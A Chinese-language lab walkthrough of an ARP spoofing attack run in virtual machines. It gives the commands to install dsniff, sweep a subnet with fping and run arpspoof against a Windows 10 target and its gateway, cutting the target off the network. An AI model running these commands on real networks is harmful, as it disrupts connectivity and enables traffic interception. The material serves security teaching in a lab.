攻击机kali: 192.168.244.131
靶机win10: 192.168.244.128
靶机网关: 192.168.244.2
注:一切都在虚拟机里进行的实验
现在可以发现我们靶机的网络是正常的
我们开始实验:
因为ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:
安装dsniff
apt-get install dsniff -y
注意:如果下载失败,可能是kali源的问题,可以编辑一下软件源配置文件
vim /etc/apt/sources.list //进入软件源配置文件编辑模式
将原来的源注释掉,然后换成别的源,我这里用的是中科大的源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
安装一下签名
wget archive.kali.org/archive-key.asc
apt-key add archive-key.asc
更新源
apt-get update //更新源
再安装dsniff
安装好后,我们现在开始收集信息
ifconfig //确定网卡名称和地址
发现网卡名称是eth0 kali的IP地址为192.168.244.131
嗅探ip设备
fping -g 本机地址/24 //嗅探你所在WLAN下所有设备的IP地址
发现靶机的IP地址192.168.244.128
发起攻击
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
我发起的对win10靶机的攻击
arpspoof -i eth0 -t 192.168.244.128 192.168.244.2
出现下面这种情况证明攻击正在进行
我们再看看win10的情况
可以看见,攻击已经成功,win10已经无法连接到网络
注:按ctrl z可以中断攻击